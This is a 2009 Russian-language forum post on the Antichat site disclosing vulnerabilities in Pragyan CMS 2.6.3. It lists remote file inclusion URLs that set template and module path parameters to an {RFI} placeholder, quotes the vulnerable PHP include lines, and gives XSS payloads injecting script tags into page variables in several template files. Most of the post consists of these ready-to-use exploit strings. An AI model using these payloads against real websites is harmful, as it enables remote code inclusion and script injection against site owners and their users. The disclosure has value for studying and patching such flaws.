ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
   
 
 
Опции темы Поиск в этой теме Опции просмотра

Pragyan CMS 2.6.3 Multiple Vulnerabilities
  #1  
Старый 22.04.2009, 01:00
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию Pragyan CMS 2.6.3 Multiple Vulnerabilities

Pragyan CMS 2.6.3 Multiple Vulnerabilities
Developers: sourceforge.net/projects/pragyan

1) Remote File Inclusion
Need: register_globals = on

http://localhost/pragyan/cms/templates/nitt2/index.php?TEMPLATECODEPATH={RFI}?
http://localhost/pragyan/cms/templates/nitt3/index.php?TEMPLATECODEPATH={RFI}?
http://localhost/pragyan/cms/templates/nitt4/index.php?TEMPLATECODEPATH={RFI}?
http://localhost/pragyan/cms/templates/default/index.php?TEMPLATECODEPATH={RFI}?
PHP код:
<?
include_once("$TEMPLATECODEPATH/sidebar.php");
http://localhost/pragyan/cms/modules/search/search.php?sourceFolder={RFI}?
PHP код:
$searchModuleFolder "$sourceFolder/$moduleFolder/search";
$include_dir "$searchModuleFolder/include";
include (
"$include_dir/commonfuncs.php"); 
и ещё один инклуд остался с версии 2.6.2
http://localhost/pragyan/cms/modules/form.lib.php?sourceFolder={RFI}?
PHP код:
global $sourceFolder;
global 
$moduleFolder;
require_once(
"$sourceFolder/$moduleFolder/form/editform.php"); 
2) XSS
Need: register_globals = on

http://localhost/pragyan/cms/templates/acm/index.php
http://localhost/pragyan/cms/templates/crystalx/index.php
http://localhost/pragyan/cms/templates/blue/index.php
http://localhost/pragyan/cms/templates/default/index.php
http://localhost/pragyan/cms/templates/nitt2/index.php
http://localhost/pragyan/cms/templates/nitt3/index.php
http://localhost/pragyan/cms/templates/nitt4/index.php
http://localhost/pragyan/cms/templates/prag08V2-black/index.php
PHP код:
$TITLE = </title><script>alert('xek')</script>
$TEMPLATEBROWSERPATH "><script>alert('xek')</script>
... etc 
Всех переменных не пишу, так как их оч много. И думаю что код приводить не имеет смысла

Пока что не весь двиг раскопал, проблемы с mod_rewrite (
 
Ответить с цитированием
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Exero CMS 1.0.1.1 Multiple Vulnerabilities Spyder Сценарии/CMF/СMS 0 13.04.2009 22:38
VUEngine 2.2 Multiple Vulnerabilities Spyder Сценарии/CMF/СMS 0 13.04.2009 22:36
CMS vs "изготовление на коленках" vadim_samoilov Чужие Статьи 8 19.08.2008 02:10
Symantec Scan Engine Multiple Vulnerabilities NeMiNeM Forum for discussion of ANTICHAT 1 25.04.2006 18:08
osTicket <= 1.3.1 Multiple vulnerabilities Rebz Мировые новости 0 03.07.2005 13:13



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ